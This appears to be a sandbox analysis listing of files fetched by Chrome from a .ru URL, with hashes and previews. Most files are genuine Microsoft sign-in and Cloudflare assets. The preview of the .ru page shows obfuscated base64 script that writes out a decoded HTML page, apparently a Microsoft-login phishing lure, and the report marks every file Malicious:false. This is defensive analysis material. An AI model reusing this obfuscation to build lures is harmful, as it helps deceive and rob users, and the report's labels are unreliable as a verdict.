                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (7549), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):20048
                                                                    Entropy (8bit):5.870557307557149
                                                                    Encrypted:false
                                                                    SSDEEP:384:ynnuoWw1UPgDVGRMRPKLnuoWw1UPgDVGRMRP1lrkHlrA:yAOUWGRMRPKEOUWGRMRP1lrIlrA
                                                                    MD5:A4AFC35A6BE470A022152B738A1A2AB2
                                                                    SHA1:3D2F3A96748FCE181138BD40B7498E170FB97D2C
                                                                    SHA-256:8002E6B31230320F015F2A19DF4A7881645ABE0015EB051935BE5E07D343C3F4
                                                                    SHA-512:EEE087EBA04100E0DC109D6B7F6430DF22B668DAF7C38AB064F0CD55A6A5B541686F80E8E64AFA2A8C7314CB16F798DEE3724030983C73FCAA92F3E2F5D79D66
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://r.bitualicar.ru/2Q5WxE/
                                                                    Preview: Success is walking from failure to failure with no loss of enthusiasm. -->..<script>../* Do not be embarrassed by your failures, learn from them and start again. */..if(atob("aHR0cHM6Ly9IcG5qLmJpdHVhbGljYXIucnUvMlE1V3hFLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4Mj
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                    Category:dropped
                                                                    Size (bytes):16378
                                                                    Entropy (8bit):7.986541062710992
                                                                    Encrypted:false
                                                                    SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                    MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                    SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                    SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                    SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                    Category:downloaded
                                                                    Size (bytes):49954
                                                                    Entropy (8bit):7.99493321471063
                                                                    Encrypted:true
                                                                    SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                    MD5:E16AC075AC754DBD1CF969508220E30D
                                                                    SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                    SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                    SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                                                    Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):48316
                                                                    Entropy (8bit):5.6346993394709
                                                                    Encrypted:false
                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                    Category:downloaded
                                                                    Size (bytes):61052
                                                                    Entropy (8bit):7.996159932827634
                                                                    Encrypted:true
                                                                    SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                    MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                    SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                    SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                    SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                    Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (47520)
                                                                    Category:downloaded
                                                                    Size (bytes):47521
                                                                    Entropy (8bit):5.3981340461317835
                                                                    Encrypted:false
                                                                    SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                    MD5:7C92EC9D1395055CE0405A32607C7291
                                                                    SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                    SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                    SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):3452
                                                                    Entropy (8bit):5.117912766689607
                                                                    Encrypted:false
                                                                    SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                    MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                    SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                    SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                    SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://login.live.com/Me.htm?v=3
                                                                    Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                    Category:dropped
                                                                    Size (bytes):61052
                                                                    Entropy (8bit):7.996159932827634
                                                                    Encrypted:true
                                                                    SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                    MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                    SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                    SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                    SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                    Category:downloaded
                                                                    Size (bytes):1435
                                                                    Entropy (8bit):7.8613342322590265
                                                                    Encrypted:false
                                                                    SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 59 x 46, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):61
                                                                    Entropy (8bit):4.068159130770306
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPlKZtovxl/k4E08up:6v/lhPsMv7Tp
                                                                    MD5:E7FC78FAAF7BB5F4B399E5C4FCF9609F
                                                                    SHA1:F0DA63B1D7DF73971C810AF12CD59E0B2C034737
                                                                    SHA-256:272642193634C8501F0C48E971BF53DBD112AC01DFC3EEEB4EC9F0C2DC1948A3
                                                                    SHA-512:D2D366B5E785B2F1504B67DD92BEBFA9323A8874D0073889957D11DEB4B39648F71AE47E4D80E1F26B6443D20863AB166EB8987CF5F244EB510D9DDDE26BAD13
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.PNG........IHDR...;..........\......IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                    Category:downloaded
                                                                    Size (bytes):116345
                                                                    Entropy (8bit):7.997378915283506
                                                                    Encrypted:true
                                                                    SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                    MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                    SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                    SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                    SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                    Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):48316
                                                                    Entropy (8bit):5.6346993394709
                                                                    Encrypted:false
                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                    Category:dropped
                                                                    Size (bytes):1435
                                                                    Entropy (8bit):7.8613342322590265
                                                                    Encrypted:false
                                                                    SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                    Category:dropped
                                                                    Size (bytes):116345
                                                                    Entropy (8bit):7.997378915283506
                                                                    Encrypted:true
                                                                    SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                    MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                    SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                    SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
